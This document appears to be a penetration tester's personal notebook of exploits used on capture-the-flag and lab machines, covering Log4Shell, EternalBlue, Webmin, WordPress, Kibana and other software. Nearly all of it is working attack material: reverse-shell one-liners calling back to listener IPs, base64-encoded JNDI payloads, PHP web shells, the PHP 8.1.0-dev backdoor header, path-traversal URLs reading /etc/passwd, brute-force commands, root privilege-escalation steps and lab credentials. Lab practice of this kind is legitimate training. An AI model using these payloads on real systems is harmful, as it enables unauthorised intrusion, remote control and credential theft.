Things I have Pwn'd before

tl;dr: This page tracks things I have pwn'd before with public exploits

https://ippsec.rocks/?#

Unifi Log4Shell

Unifi Network 6.4.54
Testing, capture auth attempt in burp with creds test:test
Start tcpdump on your host station:

sudo tcpdump -i tun0 port 389

The server will response with invalid payload however it is still connecting back to us, check tcpdump to ensure the connect back

Now install the required packages:

sudo apt update
sudo apt update install openjdk-11-jdk -y
java -version
sudo apt-get install maven
mvn -v

After the payload has been created, start the Rogue-JNDI application while passing in the payload as part of the --command option and your tun0 IP address to the --hostname option.

git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
echo 'bash -c bash -i >&/dev/tcp/10.10.15.96/9001 0>&1' | base64
java -jar /opt/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuOTYvOTAwMSAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.15.96"

--hostname is your localhost tun0 interface
Now start your listener
Going back to our intercepted POST request, let's change the payload to ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat} and click Send

Apache Struts2

80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-title: Santa Naughty and Nice Tracker

USE:

search struts2
exploit(multi/http/struts2_content_type_ognl)

Microsoft-ds port 445

445/tcp open miscrosoft-ds
Run the nmap eternal scripts
USE:

nmap --script=smb-vuln* $ip
exploit(windows/smb/ms08_067_netapi)
exploit(windows/smb/ms17_010_eternalblue)

Wing FTP Server

21/tcp open wingftp
Gain access to the admin panel

search lua
exploit(windows/ftp/wing_ftp_admin_exec)

Mantis Bug Tracker

80/tcp open http mantisbt-2.3.0
CVE:2019-15715 2017-7615
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)

James POP3

110/tcp open POP3

James POP3 Server 2.3.2
https://www.exploit-db.com/exploits/35513

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 172.16.6.2 3333 >/tmp/f
echo "#!/bin/bash" > /etc/init.d/james
echo "bash -i >& /dev/tcp/172.16.6.2/5555 0>&1" >> /etc/init.d/james
cat /etc/init.d/james
sudo /sbin/reboot

Kibana

5601 is the elastic search port, 9200 is the api

curl -X GET "10.10.15.175:9200/_search?q=password&pretty"                                                                                                                                                                  130 ⨯
{
  "took" : 11,
  "timed_out" : false,
  "_shards" : {
    "total" : 6,
    "successful" : 6,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : 1,
    "max_score" : 2.0136302,
    "hits" : [
      {
        "_index" : "messages",
        "_type" : "_doc",
        "_id" : "73",
        "_score" : 2.0136302,
        "_source" : {
          "sender" : "mary",
          "receiver" : "wendy",
          "message" : "hey, can you access my dev account for me. My username is l33tperson and my password is 9Qs58Ol3AXkMWLxiEyUyyf"

If there are log files like on port 8000 which are showing you active kabana logs you can have a LFI vulnerability
Go to the 5601 port and add this extension /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt

10.10.156.71:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt

Then curl the logs and grep for root.txt

curl -s http://10.10.31.117:8000/kibana-log.txt | grep "root.txt"

Also can be used to get a shell in other situations
https://github.com/mpgn/CVE-2018-17246

Sync Breeze Enterprise

Sync Breeze Enterprise v8.9.24
https://www.exploit-db.com/exploits/40456

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.6.1 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

Microsoft ds

exploit/windows/smb/ms17_010_eternalblue

Android

5555/tcp open freeciv
Install adb

adb connect [target ip address:port]

Joomla versions 3.6.3

Able to use joomra.py in order to create an account and login

python3 joom.py -u jack -p password -e jack@gmail.com http://10.10.10.10

Edit the templates
Add in webshell
Can read the config files which has the use and password, then can ssh in

XAMPP

Got in through phpmyadmin [root:no password]
Able to get shell through SQL database commands

SELECT "<?php echo shell_exec($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/xampp/shell.php";

Then browse to:

10.10.10.10/xampp/shell.php?cmd=dir

Look for config files with passwords

C:\xampp\htdocs\admin\config.php

Lucky GetSimple!

10.16.1.2/data/users/lucky.xml

See the config file and passwd hash with username, crack in john
PE with dirtycow [CVE-2016-5195]
Compile with

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

Dolphin Wordpress

Dolphin <7.3.2 Auth bypass / RCE exploit by Ahmed Sultan

Codiad Impresscms

10.10.10.10/codiad/data/users.php

Directories found

/config.php
/data
/wordspace

Upload web shell
Found SSH creds

Techblog (Wordpress Siteimport Exploit)

http://10.16.1.3/wp-content/plugins/site-import/readme.txt
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=../../../../../../../../../../etc/passwd
wp-config.php file #has the login creds

Backupadmin

Priv Esc on box with Amanda running, view by -LFI Exploit

fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

ls -al /usr/lib/amanda
echo '#!/bin/sh
> /bin/sh' > priv.sh
chmod +x priv.sh
/usr/lib/amanada/application/amstar restore --star-path=/tmp/priv.sh
$ whoami
root

mysql Brute Force

mysql 3306 running on the target

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.16.1.11
mysql -u root 10.16.1.11 -p
SHOW DATABASES;
SHOW TABLES FROM helpdesk;
USE helpdesk;
SELECT * FROM ost_form_entry;

IP Fire 2.15

Brute the admin default [admin:admin]
https://github.com/0xskunk/IPFire-2.15-Shellshock-Exploit/blob/master/SIPS.py

Webmin 1.8.90

MiniServ 1.890 (Webmin httpd)
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
Read /etc/shadow
Add user
Reverse Shells
Read the config files
Will run as root

Webmin 1.900

MiniServ 1.900 (Webmin httpd)
Requires credentials in order to exploit
can use a metasploit module once credentials are obtained

exploit/linux/http/webmin_packageup_rce
PASSWORD   Password6543     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.1.17      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                         -metasploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   admin            yes       Webmin Username

cmd/unix/reverse_perl
LHOST  10.10.14.2       yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port

run

[*] Started reverse TCP handler on 10.10.14.2:8888 
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400

init.d linux pe

webserv

NAS4Free -Web shell via the file editor

Pro FTPD 1.3.5

https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

TeamCity Linux Priv Esc

Port was only listening locally so had to port forward in order to be able to browse to it

ssh sys-internal@10.10.250.201 -i id_rsa -L 8111:localhost:8111

TeamCity operates on port 8111 by default
Then could go to localhost:8111 in my browser
Was asked for a authentication token to login as super user
In the path

/TeamCity/logs

I was able to find a file called catalina.out which reading the contents provided me the authentication token

[TeamCity] Super user authentication token: 8119166573167676780

Once you have gained access Create a new project
Next fill in the build configurations
Next click build steps and use the following command to let /bin/bash run with full root privlages
Click save, and then run
Back to the command line and run:

/bin/bash -p
whoami
root

ClipBucket

File upload vulnerability with authentication

curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php"
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
curl --user developers:9972761drmfsls -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"

Site will tell you the MD5 Hash name of the file and the directory it is located. Make sure to add the .php extension to the end.

PHP 8.1.0-dev

This version of php was backdoored
Detect with nikto or by capturing the server response in burp
X-Powered-By: PHP 8/1/0/dev --> what you are looking for
Automated POC exploit
Manual Exploitation:
Capture a request in burp suite
Add additional User-Agentt header to the request (yes it is supposed to be spelled with two t's)
Payload:

User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1"');

Open Net Admin (ona)

Metasploit module for CMD injection 18.1.1
Database file with credentials is located here:

 /opt/ona/www/local/config/database_settings.inc.php

Wordpress HelloDolly Plugin

https://yebberdog.medium.com/try-hack-me-jack-walkthrough-904035594dc2
- craft shell from hacktricks 
- from revshells.com
<?php $sock=fsockopen("10.10.14.2",80);passthru("/bin/bash <&3 >&3 2>&3"); ?>
- update dolly code 
File edited successfully.
- now activate it 

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>

http://10.10.110.100:65000/wordpress/wp-content/plugins/hello.php?cmd=id
- code execution...
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 exploit.py http://crm.board.htb admin admin 10.10.14.53 9001
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.53] from (UNKNOWN) [10.10.11.11] 53264
bash: cannot set terminal process group (858): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

CVE-2022-37706-Enlightenment-0.25.3-LPE

If you see a suid binary called enlightenment_sys
in order to exploit, Ive had to alter the script

# change below 
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net

# to this (no line breaks)
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

./poc.sh 
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
#

Pluck CMS 4.7.18

User Input:

target_ip = sys.argv[1]
target_port = sys.argv[2]
password = sys.argv[3]
pluckcmspath = sys.argv[4]

python3 exploit.py greenhorn.htb 80 iloveyou1 /
Authentification was succesfull, uploading webshell
Uploaded Webshell to: 
http://greenhorn.htb:80//files/shell.phar

data/inc/files.php: $blockedExtentions = array('.php','php3','php4','php5','php6','php7','phtml','.phtm','.pht','.ph3','.ph4','.ph5','.asp','.cgi','.phar');
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

file upload is not working well

zip test.zip php-rev.php
adding: php-rev.php (deflated 59%)

upload the zip

De-Pixel PDF to find password

depixel file to get password

https://pdf2png.com/
// tool
https://github.com/spipm/Depix
python3 depix.py \
    -p ../../image_page_1_1.png \                    
    -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-25 19:31:34,915 - Loading pixelated image from ../../image_page_1_1.png
2024-07-25 19:31:34,929 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-25 19:31:35,788 - Finding color rectangles from pixelated space
2024-07-25 19:31:35,790 - Found 252 same color rectangles
2024-07-25 19:31:35,790 - 190 rectangles left after moot filter
2024-07-25 19:31:35,790 - Found 1 different rectangle sizes
2024-07-25 19:31:35,790 - Finding matches in search image
2024-07-25 19:31:35,790 - Scanning 190 blocks with size (5, 5)
2024-07-25 19:31:35,829 - Scanning in searchImage: 0/1674

Previousssh agent NextTomcat

Last updated 5 months ago

Was this helpful?